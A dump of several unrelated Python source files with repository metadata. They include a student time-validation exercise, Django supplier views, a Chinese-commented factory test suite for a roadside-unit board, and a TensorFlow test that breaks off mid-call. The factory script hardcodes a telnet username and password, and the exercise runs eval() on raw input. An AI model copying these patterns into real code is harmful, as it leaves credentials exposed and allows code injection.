1298229e6667d5b56fca496bd5b6d2adb592dec4 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_1/kdsjor001/question2.py | b192808bc1bd49a030995b7d46e982d2aaa24594 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | a=eval(input('Enter the hours:\n'))
b=eval(input('Enter the minutes:\n'))
c=eval(input('Enter the seconds:\n'))
if 0<=a<=23 and 0<=b<=59 and 0<=c<=59:
print ('Your time is valid.')
else:
print ('Your time is invalid.') | [
"[email protected]"
] | |
40f756004da71f05733139a24309c3462c7ec54b | 43d4b962a83dac734dfb09b8523fdfcfcc6628c1 | /lavajato_fornecedor/views.py | c245e3d77cf35444022eb95c2347a0cc74207d4f | [] | no_license | redcliver/sistemas | 01edd98c2814eee50550010169b2c7594e5256f5 | 1129c9516c57fbf53ce3cf5e0e5feb3835d3e9df | refs/heads/master | 2020-04-07T17:23:04.809752 | 2019-05-02T16:24:18 | 2019-05-02T16:24:18 | 158,567,651 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,460 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from .models import fornecedor
# Create your views here.
def lavajato_fornecedor(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
if request.method == 'POST' and request.POST.get('nome') != None:
name = request.POST.get('nome')
telefone = request.POST.get('tel')
celular = request.POST.get('cel')
cpf = request.POST.get('cpf')
email = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
novo_fornecedor = fornecedor(nome=name, telefone=telefone, celular=celular, cpf=cpf, email=email, endereco=endereco, numero=numero, bairro=bairro, cidade=cidade, uf_cidade=uf_cidade)
novo_fornecedor.save()
msg = name+" salvo com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor','msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor'})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def busca(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_visualiza.html', {'title':'Visualizar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca.html', {'title':'Buscar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def edita(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def salva(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
nome = request.POST.get('nome')
tel = request.POST.get('tel')
cel = request.POST.get('cel')
cpf = request.POST.get('cpf')
mail = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
bloqueado = request.POST.get('bloqueado')
fornecedor_obj.nome = nome
fornecedor_obj.telefone = tel
fornecedor_obj.celular = cel
fornecedor_obj.cpf = cpf
fornecedor_obj.email = mail
fornecedor_obj.endereco = endereco
fornecedor_obj.numero = numero
fornecedor_obj.bairro = bairro
fornecedor_obj.cidade = cidade
fornecedor_obj.uf_cidade = uf_cidade
fornecedor_obj.estado = bloqueado
fornecedor_obj.save()
msg = fornecedor_obj.nome + " editado(a) com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj, 'msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'}) | [
"[email protected]"
] | |
ac3a413222f1c781a87ae64071c11456543630e3 | 71764665e27f4b96bab44f38a4a591ffc2171c24 | /hhplt/productsuite/RD50C/auto_test1.py | 343f405b2ee4ee990bbf72e929d2d148330595b7 | [] | no_license | kingdomjc/RSU_production_VAT | 693f8c504acc0cc88af92942734ccb85f7e7d7c0 | 9a3d6d3f5a5edfaf30afdff725661630aafe434c | refs/heads/master | 2020-07-31T05:03:46.699606 | 2019-09-24T02:09:53 | 2019-09-24T02:09:53 | 210,491,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,235 | py | #encoding:utf-8
u'''本工位测试前请先在测试PC上运行APP版本下载服务程序TFTPSRV.EXE;
1、被测RSDB0单板通过排线连接作为工装的RSIB0板(LED&PSAM卡面板)、测试串口线、网口连接网线;
2、RSDB0单板上电;
3、根据VAT提示按下单板上复位按钮S1;
4、面板灯测试项需人工观察判断面板灯运行情况。
'''
import socket
import serial
from hhplt.deviceresource.checkVersion import VersionManager
from hhplt.productsuite.RD50C import downloadEPLD
from hhplt.testengine.server import ServerBusiness
suiteName = u'''RSDB0单板功能测试工位'''
version = "1.0"
failWeightSum = 10 #整体不通过权值,当失败权值和超过此,判定测试不通过
import binascii
import os
import re
import telnetlib
from hhplt.deviceresource.RD50CAutoTestMyd import PsamProxy, DeviceProxy, RTCProxy, MACProxy, PCIEProxy
from hhplt.testengine.testcase import superUiLog, uiLog
from hhplt.testengine.exceptions import TestItemFailException,AbortTestException
from hhplt.deviceresource import RD50CDownloadNetMyd
import time
from hhplt.deviceresource import TestResource, askForResource
from hhplt.parameters import PARAM
import hhplt.testengine.manul as manul
from hhplt.testengine.manul import askForSomething, manulCheck
import manual_test
#串口夹具开合触发器
#测试函数体例:T_<序号>_方法名
#_A为自动完成测试,_M为人工测试;函数正常完成,返回值为输出数据(可空);异常完成,抛出TestItemFailException异常,含输出(可选)
#函数的doc中,<测试名称>-<描述>
#可选的两个函数:setup(product)和rollback(product),前者用于在每次测试开始前(不管选择了多少个用例)都执行;后者当测试失败(总权值超出)后执行
def __checkManualFinished(idCode):
'''检查RSDB0单板电源&BOOT下载工位已完成'''
with ServerBusiness(testflow = True) as sb:
status = sb.getProductTestStatus(productName="RD50C_RSU" ,idCode = idCode)
if status is None:
raise AbortTestException(message=u"RSDB0尚未进行单板测试,RSDB0单板功能测试终止")
else:
sn1 = downloadEPLD.suiteName
if sn1 not in status["suiteStatus"] or status["suiteStatus"][sn1] != 'PASS':
raise AbortTestException(message=u"RSDB0单板电源&BOOT下载测试项未进行或未通过,RSDB0单板功能测试终止")
def pingIPOpen(pingIP):
data = os.popen('ping %s' % pingIP).readlines()
print data
for line in data:
if re.search(r'TTL=', line, re.I):
return "ok"
return "no"
def __doorDog():
sc = __askForPlateDeviceCom() # 获取资源GS10PlateDevice
downNet = sc.doorDog()
return downNet
def __askForPlateDeviceCom():
'''获得工装板资源'''
sc = askForResource('RD50CPlateDevice', RD50CDownloadNetMyd.GS10PlateDevice,
serialPortName = PARAM["defaultCOMPort"],
cableComsuption = 1)
return sc
def __downloadVersion():
sc = __askForPlateDeviceCom() # 获取资源GS10PlateDevice
versionFile = None
downNet = sc.downloadVersion(version_file=versionFile)
return downNet
def T_01_scanCode_A(product):
u'扫码条码-扫描条码'
barCode = askForSomething(u'扫描条码', u'请扫描RSDB0单板条码', autoCommit=False)
__checkManualFinished(barCode)
product.setTestingProductIdCode(barCode)
product.setTestingSuiteBarCode(barCode)
return {u"RSDB0单板条码": barCode}
def T_02_downloadNet1_A(product):
u'单板网口测试-RSDB0单板网口通信功能及APP版本下载测试'
retry = ""
t = 0
while True:
t += 1
powerResult = manulCheck(u'复位', u'%s请在点击确定按钮后,按下单板上的复位按键S1'%retry,check="ok")
if powerResult:
downNet = __downloadVersion()
if downNet == "OK":
return
elif downNet == "loginfail":
retry = "登录超时,请重新操作,"
if t == 2:
raise TestItemFailException(failWeight=10, message=u'串口无打印')
elif downNet == "TFTPfail":
# retry = "TFTP开启失败,请重新操作,"
# continue
raise TestItemFailException(failWeight=10, message=u'APP版本下载失败, 可能是没有打开TFTP')
else:
raise TestItemFailException(failWeight=10, message=u'BOOT下载失败,未知异常')
def myReadMac():
macoffset = 0x46
proxy = MACProxy(PARAM["defaultNetOneIp"])
try:
readMac = proxy.readEeprom(macoffset, 6)
macstrRead = ""
macstrRead += binascii.hexlify(readMac[0:1])
macstrRead += binascii.hexlify(readMac[1:2])
macstrRead += binascii.hexlify(readMac[2:3])
macstrRead += binascii.hexlify(readMac[3:4])
macstrRead += binascii.hexlify(readMac[4:5])
macstrRead += binascii.hexlify(readMac[5:6])
return macstrRead
except:
raise TestItemFailException(failWeight=10, message=u"读取mac失败,EEPROM测试失败")
finally:
proxy.close()
def myWriteMac(macstr):
macoffset = 0x46
proxy = MACProxy(PARAM["defaultNetOneIp"])
for i in range(25):
try:
print "读个看看%d" % i
proxy.initResource()
proxy.readEeprom(0x27, 12)
break
except:
time.sleep(10)
else:
proxy.close()
raise TestItemFailException(failWeight=10, message=u"建立连接失败,EEPROM测试失败")
try:
macLast = binascii.unhexlify(macstr)
proxy.writeEeprom(macoffset, macLast)
except:
raise TestItemFailException(failWeight=10, message=u"写入mac失败,EEPROM测试失败")
finally:
proxy.close()
def T_03_MACTest_A(product):
u'EEPROM测试-EEPROM读写测试'
myWriteMac("A1A1A1A1A1A1")
macstrRead2 = myReadMac()
if macstrRead2.upper() == "A1A1A1A1A1A1":
return {u"EEPROM测试":u"EEPROM读写成功"}
raise TestItemFailException(failWeight=10, message=u"写入与分配mac不一致,EEPROM测试失败")
def T_04_checkVersionTest_A(product):
u"查询版本号-查询版本号"
sc = VersionManager(PARAM["defaultNetOneIp"])
# sc = __askForCheckVersion()
try:
ret = sc.queryVersion()
except:
raise TestItemFailException(failWeight=1, message=u"版本获取失败")
finally:
sc.close()
if ret["sysRuning"] == 0:
sysVersion = ret["sys0VersionNum"]
sysStandby = ret["sys1VersionNum"]
else:
sysVersion = ret["sys1VersionNum"]
sysStandby = ret["sys0VersionNum"]
return{u"应用版本号":ret["appRuningVersionNum"],u"系统版本号":sysVersion,u"备用系统版本号":sysStandby}
def T_05_PSAMTest_A(product):
u'PSAM卡接口测试-RSDB0单板连接RSIB0单板进行4个PSAM卡接口测试'
errorList = []
# proxy = __askForRD50CNet1()
proxy = PsamProxy(PARAM["defaultNetOneIp"])
command = "00a4000002df01"
try:
for slot in range(4):
ack = proxy.active(slot)
if ack[0:4] != "e800":
superUiLog(u"PSAM卡槽[%d]激活失败"%(slot+1) + ack)
errorList.append(str(slot+1))
continue
else:
superUiLog(u"PSAM卡槽[%d]激活成功"%(slot+1) + ack[4:])
ackRead = proxy.exchangeApdu(slot, command)
if ackRead[0:4] != "e900":
uiLog(u"命令执行失败 " + ack)
else:
uiLog(u"命令执行成功 " + ack[4:])
finally:
proxy.close()
if errorList != []:
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u'PSAM卡槽%s激活失败' % ",".join(errorList))
return
def T_06_lightTest_M(protduct):
u"面板灯接口测试-RSDB0单板连接RSIB0单板进行单板面板灯接口测试"
LightDict = {"系统PWR":"长亮","系统RUN":"闪烁","系统SAM":"长亮"}
alist = []
for alight in LightDict:
lightResult = manulCheck(u"面板灯接口测试", u"请观察%s灯是否%s"%(alight,LightDict[alight]))
if lightResult:
continue
alist.append(alight)
# proxy = __askForRD50CLight()
proxy = DeviceProxy(PARAM["defaultNetOneIp"])
try:
epld_addr = int(str("da"), 16)
epld_value = int(str("0"), 16)
proxy._write_epld(epld_addr, epld_value)
redlightResult = manulCheck(u"系统报警灯", u"请观察系统ALM灯是否闪烁,点击正常后ALM灯将会关闭")
if redlightResult:
epld_addr1 = int(str("da"), 16)
epld_value1 = int(str("1"), 16)
proxy._write_epld(epld_addr1, epld_value1)
else:
alist.append("系统ALM")
epld_addr1 = int(str("da"), 16)
epld_value1 = int(str("1"), 16)
proxy._write_epld(epld_addr1, epld_value1)
time.sleep(0.5)
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("00"), 16)
proxy._write_epld(epld_addr1, epld_value1)
sixlightResult = manulCheck(u"led灯亮起提示", u"led灯ANT1-ANT6是否亮起,判断后会关闭led灯")
if sixlightResult:
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("3f"), 16)
proxy._write_epld(epld_addr1, epld_value1)
else:
alist.append("ANT1-ANT6灯")
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("3f"), 16)
proxy._write_epld(epld_addr1, epld_value1)
finally:
proxy.close()
if alist:
cir = ",".join(alist)
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u"%s测试不正常" % cir)
return
def _T_07_PCIETest_A(product):
u"PCIE测试-PCIE测试"
proxy = PCIEProxy(PARAM["PCIEIp"])
try:
recvResult = proxy.sendPcie()
print recvResult
except:
raise TestItemFailException(failWeight=10, message=u"PCIE测试失败")
finally:
proxy.close()
def T_07_carDetection_A(protduct):
u"车检串口-车检串口"
proxy = DeviceProxy(PARAM["defaultNetOneIp"])
try:
epld_addr = int(str("d4"), 16)
epld_value = int(str("7"), 16)
proxy._write_epld(epld_addr, epld_value)
pullOutResult = manulCheck(u"提示", u"请再车检插口的工装接口插拔之后,点击确定")
if pullOutResult:
read_epld_addr = int(str("90"), 16)
readResult = proxy._read_epld(read_epld_addr)
readResult = hex(readResult)[2:]
print readResult
if readResult != "c0":
proxy.close()
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u"车检口测试失败,错误码%s"%readResult)
epld_addr1 = int(str("d2"),16)
epld_value1 = int(str("1"),16)
epld_value2 = int(str("0"),16)
proxy._write_epld(epld_addr1, epld_value1)
time.sleep(0.5)
proxy._write_epld(epld_addr1, epld_value2)
finally:
proxy.close()
def _T_08_serialPort_A(product):
u"串口测试-串口测试"
time.sleep(10)
ip1 = PARAM["defaultNetOneIp"]
tn = telnetlib.Telnet(ip1, port=23, timeout=10)
try:
tn.set_debuglevel(2)
tn.read_until('login: ')
tn.write('rsu_c\r')
tn.read_until('Password: ')
tn.write('shhic357\r')
tn.read_until("#")
tn.write('cat /dev/ttyS1 > myd.txt & \n')
tn.read_until("#")
se = serial.Serial(PARAM["serialPort"], 115200)
for i in range(4):
se.write("%s\n"%"mynameisco"*10)
time.sleep(2)
se.close()
tn.write("wc -l myd.txt\n")
b = tn.read_until("#", 4)
l = b.split("\n")[1].strip()[0]
print l
except:
raise AbortTestException(message=u"请检查工装连接是否正常")
finally:
tn.close()
# for i in l:
# if "4 myd.txt" in i:
# return {u"串口测试": u"成功"}
if int(l) > 0:
return {u"串口测试": u"成功,%s"%l}
else:
raise TestItemFailException(failWeight=10, message=u'串口测试失败')
def T_09_RTCTest_A(product):
u"RTC时钟测试-RSDB0单板RTC时钟时间设置测试"
setList =[]
tmList = []
timeNow = time.localtime()
set_year = int(timeNow[0])
set_mon = int(timeNow[1])
set_day = int(timeNow[2])
set_wday = int(timeNow[6])
set_hour = int(timeNow[3])
set_min = int(timeNow[4])
set_sec = int(timeNow[5])
proxy = RTCProxy(PARAM["defaultNetOneIp"])
try:
proxy.rtc_init()
proxy.rtc_set(set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec)
setList.extend((set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec))
ack = proxy.rtc_read()
except:
raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
finally:
proxy.close()
rtc_time = binascii.hexlify(ack)
ret = int(rtc_time[0:8], 16)
tm_sec = int(rtc_time[8:16], 16)
tm_min = int(rtc_time[16:24], 16)
tm_hour = int(rtc_time[24:32], 16)
tm_mday = int(rtc_time[32:40], 16)
tm_mon = int(rtc_time[40:48], 16)
tm_year = int(rtc_time[48:56], 16)
tm_wday = int(rtc_time[56:64], 16)
tmList.extend((tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec))
print "tmList",tmList
if ret == 0:
print "get rtc time: %d-%d-%d,%d,%d:%d:%d \r\n" % (tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec)
if setList == tmList:
return
else:
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
def T_10_doorDogTest_A(product):
u"看门狗测试-RSDB0单板硬件看门狗测试"
ip1 = PARAM["defaultNetOneIp"]
tn = telnetlib.Telnet(ip1, port=23, timeout=10)
try:
tn.set_debuglevel(2)
# 输入登录用户名
tn.read_until('login: ')
tn.write('rsu_c\r')
# 输入登录密码
tn.read_until('Password: ')
tn.write('shhic357\r')
# 登录完毕后执行命令
tn.read_until("# ")
tn.write('ps\n')
psProcess = tn.read_until("/usr/bin/wtd")
pslist = psProcess.split("\n")
for oneProcess in pslist:
if "usr/bin/wtd" in oneProcess:
doorProcess = oneProcess.strip().split(" ")
break
else:
raise TestItemFailException(failWeight=10, message=u'没有喂狗进程')
tn.write("kill %s\n" % doorProcess[0])
time.sleep(2)
except:
raise TestItemFailException(failWeight=10, message=u'看门狗测试失败')
finally:
tn.close()
sc = __doorDog()
if sc == "ok":
return {u"看门狗测试":u"成功"}
else:
raise TestItemFailException(failWeight=10, message=u'看门狗失效')
| [
"[email protected]"
] | |
005465f20680fb4a6b902a62c9c1f39bd408de7d | 505b766aeef6dae5fdb2cab9f2550543179e10e9 | /app/keyvalue/models.py | ca70f4fd07e1a6862c13073c71802ea54c71b626 | [] | no_license | tossedwarrior/wri | 19b912630d00f64bcccc499ba22418c73c7bf359 | 0d4a0f9d7c36b04f87c7cf0ec42db4a57698137f | refs/heads/master | 2020-12-25T19:27:19.028235 | 2012-06-13T21:03:11 | 2012-06-13T21:03:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | # -*- encoding: utf-8 -*-
import os
from datetime import datetime
if 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):
from django.db import models
class JSONData(models.Model):
json = models.TextField(default='[]')
@staticmethod
def get_by_id(id):
return JSONData.objects.get(pk=id)
def put(self):
self.save()
def unique_id(self):
return self.id
class Error(models.Model):
error = models.TextField(default='')
when = models.DateTimeField(default=datetime.now)
@staticmethod
def track(log):
Error(error=log).save();
@staticmethod
def latest():
return Error.objects.order_by('-when')[:10]
else:
from models_appengine import *
| [
"[email protected]"
] | |
ae069441f2d4ce8ad54d7f0570cef537641659eb | 5dd190725aaaeb7287d935b3c99c20480b208816 | /object_detection/dataset_tools/context_rcnn/generate_embedding_data_tf2_test.py | a93e9eacd9bc9e9e98402f6d60446363b8b6c604 | [
"MIT"
] | permissive | DemonDamon/mask-detection-based-on-tf2odapi | 32d947164fb54395b9e45368c0d4bcf3a6ea1c28 | 192ae544169c1230c21141c033800aa1bd94e9b6 | refs/heads/main | 2023-05-13T05:05:44.534885 | 2021-06-08T05:56:09 | 2021-06-08T05:56:09 | 369,463,131 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,488 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for generate_embedding_data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import tempfile
import unittest
import numpy as np
import six
import tensorflow as tf
from object_detection import exporter_lib_v2
from object_detection.builders import model_builder
from object_detection.core import model
from object_detection.protos import pipeline_pb2
from object_detection.utils import tf_version
if tf_version.is_tf2():
from object_detection.dataset_tools.context_rcnn import generate_embedding_data # pylint:disable=g-import-not-at-top
if six.PY2:
import mock # pylint: disable=g-import-not-at-top
else:
mock = unittest.mock
try:
import apache_beam as beam # pylint:disable=g-import-not-at-top
except ModuleNotFoundError:
pass
class FakeModel(model.DetectionModel):
def __init__(self, conv_weight_scalar=1.0):
super(FakeModel, self).__init__(num_classes=5)
self._conv = tf.keras.layers.Conv2D(
filters=1, kernel_size=1, strides=(1, 1), padding='valid',
kernel_initializer=tf.keras.initializers.Constant(
value=conv_weight_scalar))
def preprocess(self, inputs):
return tf.identity(inputs), exporter_lib_v2.get_true_shapes(inputs)
def predict(self, preprocessed_inputs, true_image_shapes):
return {'image': self._conv(preprocessed_inputs)}
def postprocess(self, prediction_dict, true_image_shapes):
with tf.control_dependencies(prediction_dict.values()):
num_features = 100
feature_dims = 10
classifier_feature = np.ones(
(2, feature_dims, feature_dims, num_features),
dtype=np.float32).tolist()
postprocessed_tensors = {
'detection_boxes': tf.constant([[[0.0, 0.1, 0.5, 0.6],
[0.5, 0.5, 0.8, 0.8]]], tf.float32),
'detection_scores': tf.constant([[0.95, 0.6]], tf.float32),
'detection_multiclass_scores': tf.constant([[[0.1, 0.7, 0.2],
[0.3, 0.1, 0.6]]],
tf.float32),
'detection_classes': tf.constant([[0, 1]], tf.float32),
'num_detections': tf.constant([2], tf.float32),
'detection_features':
tf.constant([classifier_feature],
tf.float32)
}
return postprocessed_tensors
def restore_map(self, checkpoint_path, fine_tune_checkpoint_type):
pass
def restore_from_objects(self, fine_tune_checkpoint_type):
pass
def loss(self, prediction_dict, true_image_shapes):
pass
def regularization_losses(self):
pass
def updates(self):
pass
@contextlib.contextmanager
def InMemoryTFRecord(entries):
temp = tempfile.NamedTemporaryFile(delete=False)
filename = temp.name
try:
with tf.io.TFRecordWriter(filename) as writer:
for value in entries:
writer.write(value)
yield filename
finally:
os.unlink(temp.name)
@unittest.skipIf(tf_version.is_tf1(), 'Skipping TF2.X only test.')
class GenerateEmbeddingData(tf.test.TestCase):
def _save_checkpoint_from_mock_model(self, checkpoint_path):
"""A function to save checkpoint from a fake Detection Model.
Args:
checkpoint_path: Path to save checkpoint from Fake model.
"""
mock_model = FakeModel()
fake_image = tf.zeros(shape=[1, 10, 10, 3], dtype=tf.float32)
preprocessed_inputs, true_image_shapes = mock_model.preprocess(fake_image)
predictions = mock_model.predict(preprocessed_inputs, true_image_shapes)
mock_model.postprocess(predictions, true_image_shapes)
ckpt = tf.train.Checkpoint(model=mock_model)
exported_checkpoint_manager = tf.train.CheckpointManager(
ckpt, checkpoint_path, max_to_keep=1)
exported_checkpoint_manager.save(checkpoint_number=0)
def _export_saved_model(self):
tmp_dir = self.get_temp_dir()
self._save_checkpoint_from_mock_model(tmp_dir)
output_directory = os.path.join(tmp_dir, 'output')
saved_model_path = os.path.join(output_directory, 'saved_model')
tf.io.gfile.makedirs(output_directory)
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel()
exporter_lib_v2.INPUT_BUILDER_UTIL_MAP['model_build'] = mock_builder
output_directory = os.path.join(tmp_dir, 'output')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
exporter_lib_v2.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
trained_checkpoint_dir=tmp_dir,
output_directory=output_directory)
saved_model_path = os.path.join(output_directory, 'saved_model')
return saved_model_path
def _create_tf_example(self):
encoded_image = tf.io.encode_jpeg(
tf.constant(np.ones((4, 4, 3)).astype(np.uint8))).numpy()
def BytesFeature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def Int64Feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def FloatFeature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
example = tf.train.Example(
features=tf.train.Features(
feature={
'image/encoded': BytesFeature(encoded_image),
'image/source_id': BytesFeature(b'image_id'),
'image/height': Int64Feature(400),
'image/width': Int64Feature(600),
'image/class/label': Int64Feature(5),
'image/class/text': BytesFeature(b'hyena'),
'image/object/bbox/xmin': FloatFeature(0.1),
'image/object/bbox/xmax': FloatFeature(0.6),
'image/object/bbox/ymin': FloatFeature(0.0),
'image/object/bbox/ymax': FloatFeature(0.5),
'image/object/class/score': FloatFeature(0.95),
'image/object/class/label': Int64Feature(5),
'image/object/class/text': BytesFeature(b'hyena'),
'image/date_captured': BytesFeature(b'2019-10-20 12:12:12')
}))
return example.SerializeToString()
def assert_expected_example(self, example, topk=False, botk=False):
# Check embeddings
if topk or botk:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
218)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[2])
else:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
109)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[1])
self.assertAllEqual(
example.features.feature['image/embedding_length'].int64_list.value,
[109])
# Check annotations
self.assertAllClose(
example.features.feature['image/object/bbox/ymin'].float_list.value,
[0.0])
self.assertAllClose(
example.features.feature['image/object/bbox/xmin'].float_list.value,
[0.1])
self.assertAllClose(
example.features.feature['image/object/bbox/ymax'].float_list.value,
[0.5])
self.assertAllClose(
example.features.feature['image/object/bbox/xmax'].float_list.value,
[0.6])
self.assertAllClose(
example.features.feature['image/object/class/score']
.float_list.value, [0.95])
self.assertAllClose(
example.features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
self.assertAllClose(
example.features.feature['image/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/class/text']
.bytes_list.value, [b'hyena'])
# Check other essential attributes.
self.assertAllEqual(
example.features.feature['image/height'].int64_list.value, [400])
self.assertAllEqual(
example.features.feature['image/width'].int64_list.value, [600])
self.assertAllEqual(
example.features.feature['image/source_id'].bytes_list.value,
[b'image_id'])
self.assertTrue(
example.features.feature['image/encoded'].bytes_list.value)
def test_generate_embedding_data_fn(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example)
def test_generate_embedding_data_with_top_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 2
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, topk=True)
def test_generate_embedding_data_with_bottom_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 0
bottom_k_embedding_count = 2
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, botk=True)
def test_beam_pipeline(self):
with InMemoryTFRecord([self._create_tf_example()]) as input_tfrecord:
temp_dir = tempfile.mkdtemp(dir=os.environ.get('TEST_TMPDIR'))
output_tfrecord = os.path.join(temp_dir, 'output_tfrecord')
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
num_shards = 1
embedding_type = 'final_box_features'
pipeline_options = beam.options.pipeline_options.PipelineOptions(
runner='DirectRunner')
p = beam.Pipeline(options=pipeline_options)
generate_embedding_data.construct_pipeline(
p, input_tfrecord, output_tfrecord, saved_model_path,
